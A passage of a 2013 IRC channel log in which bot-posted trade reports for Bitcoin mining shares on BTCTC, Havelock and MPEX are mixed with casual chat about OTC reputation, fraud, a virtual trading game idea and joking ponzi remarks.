21:01:55 but it's more about building some otc rep, i could go through a major exchange if i wanted Jul 13 21:03:40 just chill in IRC Jul 13 21:03:47 and build rep that way Jul 13 21:03:55 I built rep by buying stuff with BTC Jul 13 21:04:08 I buy BTC then spend it on Steam games so someone has to proxy Jul 13 21:07:49 i suppose that would work Jul 13 21:08:32 but i don't have time to chill 5 hours a day on a irc chan Jul 13 21:09:23 [BTCTC] [AMC-PT] 21 @ 0.0025 = 0.0525 BTC [+] Jul 13 21:13:34 [HAVELOCK] [SDSTM] 38 @ 0.009 = 0.342 BTC [-] Jul 13 21:13:44 [HAVELOCK] [SDSTM] 63 @ 0.00889 = 0.5601 BTC [-] Jul 13 21:14:32 [HAVELOCK] [SDSTM] 5 @ 0.0085 = 0.0425 BTC [-] Jul 13 21:14:48 [HAVELOCK] [SDSTM] 1 @ 0.0081 BTC [-] Jul 13 21:14:54 [HAVELOCK] [SDSTM] 1 @ 0.007601 BTC [-] Jul 13 21:15:42 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 13 21:16:16 [BTCTC] [DMS.PURCHASE] 1 @ 0.04035 BTC [-] Jul 13 21:19:45 [HAVELOCK] [SDSTM] 10 @ 0.0076 = 0.076 BTC [-] Jul 13 21:19:52 [HAVELOCK] [SDSTM] 5 @ 0.0076 = 0.038 BTC [-] Jul 13 21:20:02 [HAVELOCK] [SDSTM] 88 @ 0.0075889 = 0.6678 BTC [-] Jul 13 21:20:13 [HAVELOCK] [SDSTM] 1 @ 0.0071 BTC [-] Jul 13 21:22:37 [HAVELOCK] [AM100] 1 @ 0.04066 BTC [+] Jul 13 21:22:52 [HAVELOCK] [SDSTM] 2 @ 0.007021 = 0.014 BTC [-] Jul 13 21:27:41 [BTCTC] [COGNITIVE] 5 @ 0.56 = 2.8 BTC [-] Jul 13 21:27:42 [BTCTC] [COGNITIVE] 2 @ 0.57 = 1.14 BTC [+] Jul 13 21:28:54 [BTCTC] [DMS.MINING] 2 @ 0.01525 = 0.0305 BTC [+] Jul 13 21:30:43 [BTCTC] [ASICMINER-PT] 5 @ 4.29 = 21.45 BTC [+] Jul 13 21:30:46 [BTCTC] [ASICMINER-PT] 6 @ 4.3 = 25.8 BTC [+] Jul 13 21:33:14 [BTCTC] [DMS.PURCHASE] 2 @ 0.04035 = 0.0807 BTC [-] Jul 13 21:34:42 [BTCTC] [BITVPS] 1 @ 0.0021 BTC [+] Jul 13 21:38:03 [BTCTC] [ASICMINER-PT] 2 @ 4.3 = 8.6 BTC [+] Jul 13 21:42:50 [HAVELOCK] [VTX] 1 @ 0.6 BTC [+] Jul 13 21:44:48 [BTCTC] [AMC-PT] 4500 @ 0.0025 = 11.25 BTC [+] Jul 13 21:46:44 [BTCTC] [DMS.MINING] 16 @ 0.01525 = 0.244 BTC [+] Jul 13 21:46:46 [BTCTC] [DMS.MINING] 3 @ 0.015588 = 0.0468 BTC [+] Jul 13 21:46:49 [BTCTC] [DMS.MINING] 30 @ 0.015588 = 0.4676 BTC [+] Jul 13 21:46:50 [BTCTC] [DMS.MINING] 12 @ 0.015589 = 0.1871 BTC [+] Jul 13 21:46:51 [BTCTC] [DMS.MINING] 30 @ 0.015589 = 0.4677 BTC [+] Jul 13 21:59:47 [BTCTC] [TAT.ASICMINER] 18 @ 0.041899 = 0.7542 BTC [-] Jul 13 21:59:48 [BTCTC] [TAT.ASICMINER] 25 @ 0.041974 = 1.0494 BTC [+] Jul 13 21:59:50 [BTCTC] [TAT.ASICMINER] 9 @ 0.041975 = 0.3778 BTC [+] Jul 13 21:59:52 [BTCTC] [TAT.ASICMINER] 17 @ 0.041983 = 0.7137 BTC [+] Jul 13 22:01:20 [HAVELOCK] [AM100] 1 @ 0.04066 BTC [+] Jul 13 22:03:38 Apocalyptic kinda why the system works. Jul 13 22:06:20 how me being available all day in an irc chan makes me less a scammer ? Jul 13 22:13:01 [MPEX] [S.MPOE] 3400 @ 0.00086691 = 2.9475 BTC [+] Jul 13 22:13:37 http://trilema.com/2012/adnotated-words-of-wisdom-on-the-topic-of-online-fraud/ Jul 13 22:13:41 Adnotated words of wisdom on the topic of online fraud pe Trilema - Un blog de Mircea Popescu. Jul 13 22:13:57 lokl Jul 13 22:13:58 how me being available all day in an irc chan makes me less a scammer ? Jul 13 22:13:58 * Apocalyptic has quit (Read error: Connection reset by peer) Jul 13 22:13:58 [MPEX] [S.MPOE] 3400 @ 0.00086691 = 2.9475 BTC [+] Jul 13 22:13:58 http://trilema.com/2012/adnotated-words-of-wisdom-on-the-topic-of-online-fraud/ Jul 13 22:16:08 thx Jul 13 22:19:49 lol mircea_popescu oh you sly dog Jul 13 22:19:58 [MPEX] [S.MPOE] 17250 @ 0.00087203 = 15.0425 BTC [+] Jul 13 22:25:03 [HAVELOCK] [AM1] 2 @ 4.31 = 8.62 BTC [+] Jul 13 22:28:23 [HAVELOCK] [HIM] 1 @ 0.272 BTC [+] Jul 13 22:28:29 [HAVELOCK] [AM100] 1 @ 0.040661 BTC [+] Jul 13 22:32:07 hm ? Jul 13 22:34:37 [HAVELOCK] [AM100] 2 @ 0.04066 = 0.0813 BTC [-] Jul 13 22:35:27 [HAVELOCK] [AM1] 1 @ 4.371 BTC [+] Jul 13 22:36:39 [BTCTC] [TAT.ASICMINER] 12 @ 0.041982 = 0.5038 BTC [-] Jul 13 22:36:41 [BTCTC] [TAT.ASICMINER] 24 @ 0.041983 = 1.0076 BTC [+] Jul 13 22:38:44 [BTCTC] [TAT.ASICMINER] 9 @ 0.042295 = 0.3807 BTC [+] Jul 13 22:38:46 [BTCTC] [TAT.ASICMINER] 47 @ 0.042296 = 1.9879 BTC [+] Jul 13 22:38:47 [BTCTC] [COGNITIVE] 1 @ 0.55 BTC [-] Jul 13 22:38:49 [BTCTC] [TAT.ASICMINER] 68 @ 0.0424 = 2.8832 BTC [+] Jul 13 22:45:34 [BTCTC] [S.DICE-PT] 200 @ 0.002239 = 0.4478 BTC [+] Jul 13 22:45:36 [BTCTC] [S.DICE-PT] 10 @ 0.00224 = 0.0224 BTC [+] Jul 13 22:45:37 [BTCTC] [S.DICE-PT] 10 @ 0.00226 = 0.0226 BTC [+] Jul 13 22:46:13 [BTCTC] [TAT.VIRTUALMINE] 458 @ 0.00422 = 1.9328 BTC [+] Jul 13 22:47:29 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.004329 = 0.0606 BTC [+] Jul 13 22:48:09 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.00435 = 0.0261 BTC [+] Jul 13 22:48:58 [BTCTC] [TAT.VIRTUALMINE] 160 @ 0.00444 = 0.7104 BTC [+] Jul 13 22:49:13 my momma dun told me Jul 13 22:49:34 mircea_popescu: you still there I'm sending .011 coins now Jul 13 22:49:40 for trilema credits Jul 13 22:50:19 [BTCTC] [TAT.VIRTUALMINE] 240 @ 0.00445 = 1.068 BTC [+] Jul 13 22:51:09 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00445 BTC [+] Jul 13 22:56:35 [HAVELOCK] [SDSTM] 5 @ 0.0094 = 0.047 BTC [+] Jul 13 22:56:37 [HAVELOCK] [SDSTM] 10 @ 0.0094 = 0.094 BTC [+] Jul 13 22:59:31 [BTCTC] [BASIC-MINING] 1 @ 0.789487 BTC [+] Jul 13 23:01:00 [BTCTC] [BASIC-MINING] 8 @ 0.789487 = 6.3159 BTC [+] Jul 13 23:01:19 aite Jul 13 23:02:04 [BTCTC] [TAT.VIRTUALMINE] 41 @ 0.00445 = 0.1825 BTC [+] Jul 13 23:02:15 [BTCTC] [ASICMINER-PT] 3 @ 4.297995 = 12.894 BTC [-] Jul 13 23:02:23 [BTCTC] [AMC-PT] 1990 @ 0.0025 = 4.975 BTC [+] Jul 13 23:03:03 [BTCTC] [RSM] 47 @ 0.015 = 0.705 BTC [+] Jul 13 23:03:05 [BTCTC] [RSM] 1 @ 0.015 BTC [+] Jul 13 23:03:26 [BTCTC] [AMC-PT] 250 @ 0.0025 = 0.625 BTC [+] Jul 13 23:07:13 [BTCTC] [ASICMINER-PT] 4 @ 4.240016 = 16.9601 BTC [-] Jul 13 23:07:51 [BTCTC] [ASICMINER-PT] 5 @ 4.240015 = 21.2001 BTC [-] Jul 13 23:08:03 [BTCTC] [S.DICE-PT] 300 @ 0.002339 = 0.7017 BTC [+] Jul 13 23:08:16 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 13 23:08:34 [BTCTC] [S.DICE-PT] 100 @ 0.00234 = 0.234 BTC [+] Jul 13 23:08:38 [BTCTC] [ASICMINER-PT] 1 @ 4.240013 BTC [-] Jul 13 23:09:04 [BTCTC] [S.DICE-PT] 100 @ 0.00235 = 0.235 BTC [+] Jul 13 23:09:15 [BTCTC] [ASICMINER-PT] 2 @ 4.240006 = 8.48 BTC [-] Jul 13 23:09:23 [BTCTC] [S.DICE-PT] 200 @ 0.002358 = 0.4716 BTC [+] Jul 13 23:09:49 [BTCTC] [ASICMINER-PT] 3 @ 4.240005 = 12.72 BTC [-] Jul 13 23:10:17 [BTCTC] [S.DICE-PT] 150 @ 0.002359 = 0.3539 BTC [+] Jul 13 23:10:19 [BTCTC] [S.DICE-PT] 250 @ 0.00236 = 0.59 BTC [+] Jul 13 23:10:19 [BTCTC] [ASICMINER-PT] 1 @ 4.24 BTC [-] Jul 13 23:10:21 [BTCTC] [S.DICE-PT] 250 @ 0.002374 = 0.5935 BTC [+] Jul 13 23:10:22 [BTCTC] [S.DICE-PT] 100 @ 0.002375 = 0.2375 BTC [+] Jul 13 23:10:23 [BTCTC] [S.DICE-PT] 854 @ 0.00238 = 2.0325 BTC [+] Jul 13 23:10:58 [HAVELOCK] [SDSTM] 1 @ 0.0094 BTC [+] Jul 13 23:11:22 [BTCTC] [BASIC-MINING] 2 @ 0.71 = 1.42 BTC [-] Jul 13 23:11:24 [BTCTC] [BASIC-MINING] 3 @ 0.71 = 2.13 BTC [-] Jul 13 23:11:32 [BTCTC] [COGNITIVE] 1 @ 0.55 BTC [-] Jul 13 23:11:51 [BTCTC] [BASIC-MINING] 1 @ 0.701 BTC [-] Jul 13 23:11:52 [BTCTC] [BASIC-MINING] 6 @ 0.701 = 4.206 BTC [-] Jul 13 23:11:57 [BTCTC] [RSM] 10 @ 0.017499 = 0.175 BTC [+] Jul 13 23:11:59 [BTCTC] [RSM] 50 @ 0.0175 = 0.875 BTC [+] Jul 13 23:12:00 [BTCTC] [RSM] 5 @ 0.0194 = 0.097 BTC [+] Jul 13 23:12:02 [BTCTC] [RSM] 35 @ 0.02 = 0.7 BTC [+] Jul 13 23:12:43 [BTCTC] [RSM] 12 @ 0.02 = 0.24 BTC [+] Jul 13 23:14:21 [BTCTC] [TAT.ASICMINER] 26 @ 0.041754 = 1.0856 BTC [-] Jul 13 23:14:23 [BTCTC] [TAT.ASICMINER] 31 @ 0.041753 = 1.2943 BTC [-] Jul 13 23:20:32 [BTCTC] [ASICMINER-PT] 1 @ 4.24 BTC [-] Jul 13 23:20:33 [BTCTC] [ASICMINER-PT] 3 @ 4.212 = 12.636 BTC [-] Jul 13 23:20:34 [BTCTC] [ASICMINER-PT] 1 @ 4.211001 BTC [-] Jul 13 23:20:36 [BTCTC] [ASICMINER-PT] 1 @ 4.211001 BTC [-] Jul 13 23:20:38 [BTCTC] [ASICMINER-PT] 3 @ 4.211 = 12.633 BTC [-] Jul 13 23:20:39 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [-] Jul 13 23:20:48 [BTCTC] [COGNITIVE] 2 @ 0.55 = 1.1 BTC [-] Jul 13 23:21:50 [BTCTC] [COGNITIVE] 2 @ 0.480006 = 0.96 BTC [-] Jul 13 23:24:42 [BTCTC] [AMC-PT] 16775 @ 0.0025 = 41.9375 BTC [+] Jul 13 23:25:48 [BTCTC] [AMC-PT] 14 @ 0.0025 = 0.035 BTC [+] Jul 13 23:28:28 [BTCTC] [DMS.PURCHASE] 12 @ 0.04035 = 0.4842 BTC [-] Jul 13 23:30:22 [HAVELOCK] [SDSTM] 7 @ 0.0095 = 0.0665 BTC [+] Jul 13 23:32:58 [HAVELOCK] [VTX] 1 @ 0.6 BTC [+] Jul 13 23:33:04 [BTCTC] [DMS.SELLING] 55 @ 0.02525 = 1.3888 BTC [-] Jul 13 23:33:06 [BTCTC] [DMS.SELLING] 10 @ 0.02525 = 0.2525 BTC [-] Jul 13 23:33:08 [BTCTC] [DMS.SELLING] 40 @ 0.025012 = 1.0005 BTC [-] Jul 13 23:33:09 [BTCTC] [DMS.SELLING] 5 @ 0.02501 = 0.1251 BTC [-] Jul 13 23:33:10 [HAVELOCK] [VTX] 1 @ 0.52001 BTC [-] Jul 13 23:33:24 [HAVELOCK] [VTX] 3 @ 0.52 = 1.56 BTC [-] Jul 13 23:33:34 [BTCTC] [DMS.SELLING] 12 @ 0.02501 = 0.3001 BTC [-] Jul 13 23:33:38 [HAVELOCK] [VTX] 3 @ 0.51 = 1.53 BTC [-] Jul 13 23:33:52 [HAVELOCK] [VTX] 4 @ 0.50001 = 2 BTC [-] Jul 13 23:34:52 [HAVELOCK] [AM100] 1 @ 0.0406 BTC [-] Jul 13 23:35:14 [HAVELOCK] [AM100] 52 @ 0.0405 = 2.106 BTC [-] Jul 13 23:35:41 [BTCTC] [DMS.PURCHASE] 75 @ 0.04035 = 3.0263 BTC [-] Jul 13 23:37:22 [BTCTC] [DMS.SELLING] 1 @ 0.026249 BTC [+] Jul 13 23:45:59 [BTCTC] [S.DICE-PT] 200 @ 0.002261 = 0.4522 BTC [-] Jul 13 23:46:48 [BTCTC] [S.DICE-PT] 3 @ 0.00226 = 0.0068 BTC [-] Jul 13 23:59:27 [HAVELOCK] [SDSTM] 86 @ 0.0094 = 0.8084 BTC [-] Jul 14 00:00:51 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00445 = 0.0223 BTC [+] Jul 14 00:00:52 [HAVELOCK] [AM100] 1 @ 0.0406 BTC [+] Jul 14 00:01:43 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 14 00:04:36 [HAVELOCK] [AM100] 2 @ 0.0402 = 0.0804 BTC [-] Jul 14 00:04:36 [HAVELOCK] [AM100] 26 @ 0.0400101 = 1.0403 BTC [-] Jul 14 00:08:12 [HAVELOCK] [AM100] 165 @ 0.040011 = 6.6018 BTC [+] Jul 14 00:08:18 [HAVELOCK] [AM100] 22 @ 0.040011 = 0.8802 BTC [+] Jul 14 00:08:36 [HAVELOCK] [AM100] 39 @ 0.040011 = 1.5604 BTC [+] Jul 14 00:11:11 [BTCTC] [B.YABMC] 3 @ 0.0025 = 0.0075 BTC [+] Jul 14 00:12:24 [BTCTC] [BASIC-MINING] 1 @ 0.703 BTC [+] Jul 14 00:13:16 [BTCTC] [BASIC-MINING] 1 @ 0.702001 BTC [-] Jul 14 00:15:11 [BTCTC] [BASIC-MINING] 1 @ 0.703 BTC [+] Jul 14 00:15:13 [BTCTC] [BASIC-MINING] 9 @ 0.702001 = 6.318 BTC [-] Jul 14 00:20:26 [HAVELOCK] [AM100] 1 @ 0.0401 BTC [+] Jul 14 00:21:00 [HAVELOCK] [SDSTM] 3 @ 0.0095 = 0.0285 BTC [+] Jul 14 00:21:02 [HAVELOCK] [SDSTM] 553 @ 0.0097 = 5.3641 BTC [+] Jul 14 00:21:30 [HAVELOCK] [AM100] 5 @ 0.040011 = 0.2001 BTC [-] Jul 14 00:23:34 [BTCTC] [BASIC-MINING] 7 @ 0.702 = 4.914 BTC [-] Jul 14 00:24:13 [BTCTC] [DMS.PURCHASE] 2 @ 0.04035 = 0.0807 BTC [-] Jul 14 00:32:53 [BTCTC] [BITVPS] 3 @ 0.002015 = 0.006 BTC [-] Jul 14 00:32:53 [BTCTC] [BITVPS] 1 @ 0.002015 BTC [-] Jul 14 00:34:36 !ticker BTCTC BITVPS Jul 14 00:34:37 [BTCT:BITVPS] 1D: 0.001901 / 0.00203 / 0.002198 (2917 shares, 5.9 BTC), 7D: 0.001622 / 0.00195 / 0.0023 (19212 shares, 37.5 BTC), 30D: 0.000668 / 0.00144 / 0.0035 (57818 shares, 83.1 BTC) Jul 14 00:35:04 Namworld: where can I see the June financials for BITVPS? Jul 14 00:46:18 [BTCTC] [ASICMINER-PT] 1 @ 4.279895 BTC [+] Jul 14 00:48:20 [BTCTC] [BITVPS] 39 @ 0.001972 = 0.0769 BTC [-] Jul 14 00:51:24 [BTCTC] [BITVPS] 7 @ 0.001972 = 0.0138 BTC [-] Jul 14 00:53:01 On BitVPS website. Jul 14 00:53:57 [BTCTC] [AMC-PT] 34 @ 0.0025 = 0.085 BTC [+] Jul 14 00:55:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.042376 BTC [+] Jul 14 00:56:58 [BTCTC] [BFMINES] 4 @ 0.003998 = 0.016 BTC [-] Jul 14 00:57:50 [BTCTC] [ASICMINER-PT] 1 @ 4.202 BTC [-] Jul 14 00:58:18 [BTCTC] [S.DICE-PT] 5 @ 0.002378 = 0.0119 BTC [+] Jul 14 00:58:28 [BTCTC] [ASICMINER-PT] 6 @ 4.201 = 25.206 BTC [-] Jul 14 01:00:19 [BTCTC] [DMS.MINING] 1 @ 0.015999 BTC [+] Jul 14 01:01:01 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [+] Jul 14 01:02:29 Someone needs to make a virtual virtual stock game where you start with a set amount of fake money and invest it in virtual stocks... The idea being, everybody has an equal amount of coin to start with and use share price on the exchanges to try and predict what will happen next in the actual markets Jul 14 01:02:49 Eventually a few leaders will come out ahead, as people who consistently pick the best investments over a period of time Jul 14 01:03:36 These games exist for the global markets, why not for the BTC exchanges? I bet it'd be fun Jul 14 01:04:59 [HAVELOCK] [AM100] 56 @ 0.040011 = 2.2406 BTC [-] Jul 14 01:05:16 virtual ponzi fund? Jul 14 01:05:34 lol, no, a virtual game using fake money instead of BTC Jul 14 01:05:53 Spot the ponzis and win by not investing Jul 14 01:06:10 but ponzies are teh win Jul 14 01:06:17 id run a VPPT Jul 14 01:06:39 lol Jul 14 01:12:39 [BTCTC] [ASICMINER-PT] 1 @ 4.279865 BTC [+] Jul 14 01:12:41 [BTCTC] [ASICMINER-PT] 4 @ 4.279867 = 17.1195 BTC [+] Jul 14 01:13:37 [BTCTC] [ASICMINER-PT] 1 @ 4.279868 BTC [+] Jul 14 01:14:57 [BTCTC] [TAT.ASICMINER] 5 @ 0.042366 = 0.2118 BTC [-] Jul 14 01:16:50 [BTCTC] [DMS.MINING] 1 @ 0.0151 BTC [-] Jul 14 01:16:52 [BTCTC] [DMS.MINING] 10 @ 0.015001 = 0.15 BTC [-] Jul 14 01:16:53 [BTCTC] [DMS.MINING] 1 @ 0.015 BTC [-] Jul 14 01:16:53 [BTCTC] [DMS.MINING] 4 @ 0.015 = 0.06 BTC [-] Jul 14 01:16:54 [BTCTC] [DMS.MINING] 199 @ 0.015 = 2.985 BTC [-] Jul 14 01:17:05 [BTCTC] [TAT.ASICMINER] 26 @ 0.042369 = 1.1016 BTC [+] Jul 14 01:19:34 [BTCTC] [DMS.SELLING] 119 @ 0.02599 = 3.0928 BTC [-] Jul 14 01:20:49 [BTCTC] [DMS.SELLING] 6 @ 0.026248 = 0.1575 BTC [+] Jul 14 01:23:33 kakobreklaa: would you make an Eve ponzi with me? Jul 14 01:24:11 nobody cares about iceland krona Jul 14 01:24:32 Eve is in iceland? Jul 14 01:24:34 wait what? Jul 14 01:24:39 I'M CONFUSED Jul 14 01:26:09 lol Jul 14 01:26:29 you're late anyway. Jul 14 01:26:44 space pirate times are over Jul 14 01:28:24 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 14 01:30:43 thestringpuller, you're causing gamer boners on the forum Jul 14 01:31:42 [BTCTC] [B.YABMC] 1 @ 0.0025 BTC [+] Jul 14 01:33:09 [BTCTC] [B.YABMC] 2 @ 0.0025 = 0.005 BTC [+] Jul 14 01:40:40 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [+] Jul 14 01:43:22 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 14 01:56:17 [BTCTC] [DMS.PURCHASE] 1 @ 0.04035 BTC [-] Jul 14 01:57:21 [HAVELOCK] [AM100] 116 @ 0.040011 = 4.6413 BTC [-] Jul 14 01:57:32 ThickAsThieves: I am? Jul 14 01:57:59 [HAVELOCK] [AM100] 5 @ 0.04001001 = 0.2001 BTC [-] Jul 14 01:58:03 they love your S.MG posts Jul 14 01:58:15 unrelated (mostly) Jul 14 01:58:16 http://www.polygon.com/2013/7/12/4518936/competitive-gaming-recognized-in-u-s-as-a-pro-sport Jul 14 01:58:33 Competitive gaming recognized in U.S. as a pro sport | Polygon Jul 14 01:58:38 [HAVELOCK] [AM100] 15 @ 0.04001 = 0.6002 BTC [-] Jul 14 01:58:40 [HAVELOCK] [AM100] 220 @ 0.04 = 8.8 BTC [-] Jul 14 02:00:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.041912 = 0.1676 BTC [-] Jul 14 02:00:21 [BTCTC] [TAT.ASICMINER] 17 @ 0.041911 = 0.7125 BTC [-] Jul 14 02:00:22 [BTCTC] [TAT.ASICMINER] 30 @ 0.0419 = 1.257 BTC [-] Jul 14 02:00:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.0418 BTC [-] Jul 14 02:00:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.041799 = 0.0836 BTC [-] Jul 14 02:00:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.041774 = 0.4177 BTC [-] Jul 14 02:00:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.041773 = 0.4177 BTC [-] Jul 14 02:00:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.041762 = 0.4176 BTC [-] Jul 14 02:00:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.0417 BTC [-] Jul 14 02:01:17 [BTCTC] [DMS.MINING] 5 @ 0.015001 = 0.075 BTC [+] Jul 14 02:01:19 [BTCTC] [TAT.ASICMINER] 49 @ 0.041553 = 2.0361 BTC [-] Jul 14 02:01:21 [BTCTC] [DMS.MINING] 251 @ 0.015 = 3.765 BTC [-] Jul 14 02:01:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.041552 = 0.1662 BTC [-] Jul 14 02:01:59 [BTCTC] [B.YABMC] 50 @ 0.0025 = 0.125 BTC [+] **** BEGIN LOGGING AT Sun Jul 14 12:04:24 2013 Jul 14 12:08:58 [BTCTC] [ASICMINER-PT] 1 @ 4.222001 BTC [+] Jul 14 12:09:00 [BTCTC] [ASICMINER-PT] 2 @ 4.222 = 8.444 BTC [-] Jul 14 12:09:02 [BTCTC] [ASICMINER-PT] 8 @ 4.22 = 33.76 BTC [-] Jul 14 12:09:24 [BTCTC] [ASICMINER-PT] 1 @ 4.22 BTC [-] Jul 14 12:11:39 [BTCTC] [BTC-BOND] 1 @ 0.009996 BTC [+] Jul 14 12:13:14 [BTCTC] [ASICMINER-PT] 1 @ 4.210003 BTC [-] Jul 14 12:13:47 [BTCTC] [ASICMINER-PT] 1 @ 4.210002 BTC [-] Jul 14 12:14:29 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [-] Jul 14 12:14:47 mircea_popescu, great article you linked me yesterday Jul 14 12:14:54 yw. Jul 14 12:15:19 [BTCTC] [ASICMINER-PT] 1 @ 4.201079 BTC [-] Jul 14 12:15:23 [BTCTC] [COGNITIVE] 1 @ 0.55 BTC [-] Jul 14 12:16:08 btw i just finished a transaction via paypal, i guess there are still some trusting people Jul 14 12:16:16 [BTCTC] [ASICMINER-PT] 1 @ 4.201011 BTC [-] Jul 14 12:16:51 [BTCTC] [ASICMINER-PT] 1 @ 4.20101 BTC [-] Jul 14 12:17:27 [BTCTC] [ASICMINER-PT] 3 @ 4.201001 = 12.603 BTC [-] Jul 14 12:17:29 [BTCTC] [ASICMINER-PT] 1 @ 4.201001 BTC [-] Jul 14 12:18:08 sure. you just need to put the time in to find them Jul 14 12:18:22 sturles used to do it for noobs as a public service, not sure he's still into it. Jul 14 12:18:46 yep that's the guy Jul 14 12:19:07 he charges a 10% premium over the spot but that's acceptable given the risk Jul 14 12:19:17 [BTCTC] [AMC-PT] 11948 @ 0.0025 = 29.87 BTC [+] Jul 14 12:20:10 only does a btc or w/e anyway Jul 14 12:20:19 fries cost more. Jul 14 12:27:43 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.004 = 0.1 BTC [-] Jul 14 12:27:45 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.004 = 0.06 BTC [-] Jul 14 12:29:01 Where's this big weekend drop peole have been talking about Jul 14 12:29:06 [MPEX] [S.MPOE] 3185 @ 0.00097228 = 3.0967 BTC [+] Jul 14 12:30:49 <[\\\]> I lost it. Jul 14 12:32:24 [HAVELOCK] [VTX] 10 @ 0.63 = 6.3 BTC [+] Jul 14 12:35:39 Can you find it again? Jul 14 12:50:53 [BTCTC] [DMS.MINING] 1 @ 0.0158 BTC [+] Jul 14 12:53:29 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00412 BTC [+] Jul 14 12:59:05 [BTCTC] [COGNITIVE] 1 @ 0.578999 BTC [+] Jul 14 13:03:24 [BTCTC] [TAT.VIRTUALMINE] 49 @ 0.00412 = 0.2019 BTC [+] Jul 14 13:04:42 [BTCTC] [BFMINES] 333 @ 0.003999 = 1.3317 BTC [+] Jul 14 13:10:02 [BTCTC] [COGNITIVE] 1 @ 0.550001 BTC [-] Jul 14 13:10:08 [BTCTC] [ASICMINER-PT] 11 @ 4.22 = 46.42 BTC [+] Jul 14 13:10:25 [BTCTC] [S.DICE-PT] 1 @ 0.002355 BTC [+] Jul 14 13:12:02 [BTCTC] [ASICMINER-PT] 1 @ 4.273896 BTC [+] Jul 14 13:12:21 [BTCTC] [DMS.MINING] 107 @ 0.0158 = 1.6906 BTC [+] Jul 14 13:15:45 [BTCTC] [BASIC-MINING] 1 @ 0.759999 BTC [-] Jul 14 13:20:38 [BTCTC] [TAT.ASICMINER] 56 @ 0.041701 = 2.3353 BTC [-] Jul 14 13:21:10 [BTCTC] [DMS.SELLING] 69 @ 0.0241 = 1.6629 BTC [-] Jul 14 13:21:37 [BTCTC] [DMS.MINING] 5 @ 0.015979 = 0.0799 BTC [+] Jul 14 13:23:42 [BTCTC] [ASICMINER-PT] 10 @ 4.22 = 42.2 BTC [-] Jul 14 13:25:19 [BTCTC] [DMS.SELLING] 2 @ 0.024 = 0.048 BTC [-] Jul 14 13:25:21 [BTCTC] [DMS.SELLING] 20 @ 0.023501 = 0.47 BTC [-] Jul 14 13:25:22 [BTCTC] [DMS.SELLING] 100 @ 0.0235 = 2.35 BTC [-] Jul 14 13:25:24 [BTCTC] [DMS.SELLING] 114 @ 0.0233 = 2.6562 BTC [-] Jul 14 13:25:24 [BTCTC] [DMS.SELLING] 80 @ 0.023015 = 1.8412 BTC [-] Jul 14 13:25:26 [BTCTC] [DMS.SELLING] 50 @ 0.02301 = 1.1505 BTC [-] Jul 14 13:25:27 [BTCTC] [DMS.SELLING] 43 @ 0.023001 = 0.989 BTC [-] Jul 14 13:25:28 [BTCTC] [DMS.SELLING] 62 @ 0.023 = 1.426 BTC [-] Jul 14 13:25:45 [BTCTC] [DMS.MINING] 27 @ 0.0157 = 0.4239 BTC [-] Jul 14 13:26:30 [BTCTC] [DMS.MINING] 23 @ 0.0157 = 0.3611 BTC [-] Jul 14 13:26:53 [BTCTC] [BASIC-MINING] 2 @ 0.759999 = 1.52 BTC [-] Jul 14 13:28:02 [BTCTC] [DMS.MINING] 50 @ 0.0157 = 0.785 BTC [-] Jul 14 13:31:36 [BTCTC] [DMS.SELLING] 20 @ 0.025689 = 0.5138 BTC [+] Jul 14 13:31:38 [BTCTC] [DMS.SELLING] 60 @ 0.02569 = 1.5414 BTC [+] Jul 14 13:33:09 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 14 13:33:54 [BTCTC] [ASICMINER-PT] 2 @ 4.22 = 8.44 BTC [-] Jul 14 13:55:45 [BTCTC] [ASICMINER-PT] 1 @ 4.195 BTC [-] Jul 14 13:56:14 [HAVELOCK] [AM1] 5 @ 4.35 = 21.75 BTC [-] Jul 14 13:56:26 [HAVELOCK] [AM1] 1 @ 4.395 BTC [+] Jul 14 13:56:44 [HAVELOCK] [AM1] 4 @ 4.444 = 17.776 BTC [+] Jul 14 13:56:49 [BTCTC] [ASICMINER-PT] 1 @ 4.175 BTC [-] Jul 14 13:56:59 [HAVELOCK] [AM1] 2 @ 4.5 = 9 BTC [+] Jul 14 13:57:55 [BTCTC] [ASICMINER-PT] 1 @ 4.160003 BTC [-] Jul 14 13:57:57 [BTCTC] [ASICMINER-PT] 1 @ 4.160002 BTC [-] Jul 14 14:09:32 [BTCTC] [AMC-PT] 761 @ 0.0025 = 1.9025 BTC [+] Jul 14 14:17:30 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [+] Jul 14 14:22:27 [BTCTC] [BITVPS] 1 @ 0.002115 BTC [+] Jul 14 14:22:30 [BTCTC] [BITVPS] 1 @ 0.002075 BTC [-] Jul 14 14:23:39 mircea, can i pm you ? Jul 14 14:25:33 [BTCTC] [ASICMINER-PT] 2 @ 4.21 = 8.42 BTC [+] Jul 14 14:25:35 [BTCTC] [ASICMINER-PT] 2 @ 4.21 = 8.42 BTC [+] Jul 14 14:28:47 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004 BTC [-] Jul 14 14:31:01 [BTCTC] [COGNITIVE] 1 @ 0.578899 BTC [+] Jul 14 14:31:02 [BTCTC] [COGNITIVE] 9 @ 0.5789 = 5.2101 BTC [+] Jul 14 14:34:22 